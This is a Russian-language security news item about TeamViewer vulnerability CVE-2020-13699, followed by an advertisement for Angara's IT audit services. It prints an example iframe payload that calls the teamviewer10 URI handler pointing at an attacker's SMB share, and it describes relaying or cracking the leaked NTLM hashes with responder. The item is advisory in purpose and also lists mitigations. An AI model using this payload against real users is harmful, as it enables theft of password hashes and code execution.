Обнаружена серьезная уязвимость в TeamViewer

24.08.2020
Обнаружена серьезная уязвимость в TeamViewer

Производитель популярного ПО удаленного управления и показа TeamViewer предупредил об опасной уязвимости. 

Злоумышленник может встроить вредоносный iframe на веб-сайт с созданным URL (<iframe src = 'teamviewer10: --play \\ IP-атакующего \ share \ fake.tvs'>), что запустит настольный клиент TeamViewer Windows и заставит его открыть удаленный доступ к ресурсу по SMB (SMB share). Windows выполнит проверку подлинности NTLM при открытии шары SMB, и этот запрос может быть ретранслирован (с помощью инструмента responder) для выполнения кода (или использован для захвата и взлома хэша). Таким образом, преступник может использовать URI схему TeamViewer для утечки имени систем, хэша пароля и других данных.

Этой проблеме подвержены обработчики URI: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 и tvvpn1. Проблема может быть исправлена путем цитирования параметров, переданных вышеупомянутым URI обработчиком, например URL:  teamviewer10 Протокол "C: \ Program Files (x86) \ TeamViewer \ TeamViewer.exe" "% 1" 

Уязвимость получила идентификатор CVE 2020-13699 и устраняется обновлением ПО TeamViewer. 

К слову, уязвимости NTLM, позволяющие использовать его для подобной утечки данных – это  CVE-2019-1040 и CVE-2019-1019. Для них доступны программные коррекции (patch) и следующие рекомендации:

• применять подписывание SMB (SMB signing) на всех машинах сети,

• блокировать NTLMv1,

• применять подписывание LDAP/S (LDAP/S Signing),

• обязательно использовать расширенную защиту аутентификации (Enhanced Protection for Authentication – EPA) при запросах,

• отдавать предпочтение другим схемам аутентификации (Kerberos и др.).

Обновление системного и прикладного ПО требует обязательного и своевременного выполнения. Кроме того, важно регулярно производить аудит ПО на корректность настройки с точки зрения ИБ и использовать рекомендованные параметры. Для этого необходим экспертный уровень знаний как принципов работы ИТ-инфраструктуры, так и ИБ-рекомендаций. Это разные направления ИТ-деятельности и сочетание таких знаний достаточно редко. 

Компания Angara Professional Assistance (входит в группу компаний Angara) предлагает экспертную сервисную услугу технического аудита, которая включает проверку эффективности ИТ-систем, степени их защищенности как в части технических средств, так и в части понимания пользователями норм информационной безопасности. Услуга представляет два основных направления аудита:

Health Check. Предусматривает обследование и оценку «состояния здоровья» системы, оптимальности архитектуры, достаточности системных ресурсов, уровня отказоустойчивости и готовности к восстановлению в случае критических сбоев. Оценка проводится на основе рекомендаций производителя и опыта инженеров эксплуатации и сопровождения.

Security Health Check. Предусматривает обследование и оценку «уровня самозащиты» системы, выполнения таких базовых процессов обеспечения безопасности, как управление доступом к системе, журналирование и мониторинг событий, а также оценку обеспечения отказоустойчивости и готовности к восстановлению в случае критических сбоев.

Подробнее об услуге и тарифах можно узнать у менеджеров Angara Professional Assistance по e-mail info@angarapro.ru или телефону 8 (495) 269-26-06.

Кроме того, на сайте есть небольшой опросный лист самопроверки, результатом которого будет краткая оценка уровня самозащиты, отказоустойчивости, качества сопровождения и общее состояние здоровья информационных систем.